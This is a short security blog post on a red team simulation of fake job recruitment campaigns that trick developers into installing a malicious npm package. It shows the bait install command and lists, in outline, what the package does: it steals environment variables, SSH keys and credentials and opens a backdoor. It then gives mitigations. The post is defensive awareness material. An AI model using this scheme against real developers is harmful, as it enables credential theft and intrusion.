When npm install Gets You Hacked

A red team simulation inspired by North Korean APT group Famous Chollima, demonstrating how malicious npm packages can be weaponized in fake job recruitment campaigns targeting developers.

Introduction

In this post, we'll explore how threat actors can leverage the npm ecosystem to deliver malicious payloads through seemingly legitimate job recruitment campaigns. This technique has been used by real-world APT groups, making it a critical area of concern for developers and security professionals.

The Attack Vector

The attack begins with a fake job posting that requires candidates to install a specific npm package as part of the "technical assessment." This package appears legitimate but contains malicious code that executes upon installation.

Step 1: The Bait

The attacker creates a convincing job posting on platforms like LinkedIn or job boards, targeting developers with specific skills. The posting includes instructions to install a package:

npm install @company/assessment-tool

Step 2: The Package

The malicious package contains code that:

• Exfiltrates environment variables
• Steals SSH keys and credentials
• Establishes a backdoor connection
• Performs lateral movement reconnaissance

Detection and Mitigation

Organizations should implement:

• Package scanning and analysis
• Network monitoring for suspicious outbound connections
• Developer security training
• Least privilege access controls

Conclusion

This attack demonstrates the importance of vetting all dependencies, even those from seemingly legitimate sources. Always verify package sources and review code before installation.